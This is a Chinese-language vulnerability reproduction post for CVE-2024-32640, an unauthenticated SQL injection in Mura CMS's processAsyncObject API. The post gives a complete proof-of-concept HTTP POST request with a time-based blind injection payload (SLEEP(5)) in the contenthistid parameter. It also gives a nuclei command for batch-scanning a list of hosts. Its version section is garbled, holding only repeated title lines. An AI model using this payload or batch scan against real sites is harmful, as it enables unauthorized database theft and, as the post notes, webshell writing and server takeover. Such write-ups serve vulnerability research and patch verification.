漏洞复现-CVE-2024-32640

一:漏洞名称

Mura CMS processAsyncObject SQL注入漏洞

二:漏洞描述

Mura CMS是一款开源的内容管理系统(CMS),它旨在简化创建和管理网站、博客和应用程序的过程。Mura CMS具有直观的用户界面和强大的功能,使得用户可以轻松地创建和发布内容,而无需深入了解编程或设计技能。
该产品 MuraCMS processAsyncObject SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞 构造恶意请求获取数据库中的敏感信息,深入利用可写入后门文件可造成远程代码执行获取服务器权限。

三:漏洞影响版本


Mura CMS
漏洞复现-CVE-2024-32640
漏洞复现-CVE-2024-32640

五:漏洞复现

POC:

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
 
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
延时注入是一种利用SQL注入漏洞的技术手段,它的主要目的是通过构造恶意的SQL语句来引发延时操作。攻击者会利用延时函数或延时语句,使得数据库查询操作在执行过程中出现明显的延迟。
漏洞复现-CVE-2024-32640

六:批量检测


nuclei.exe -t POCCVE-2024-32640.yaml -l POChost.txt

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容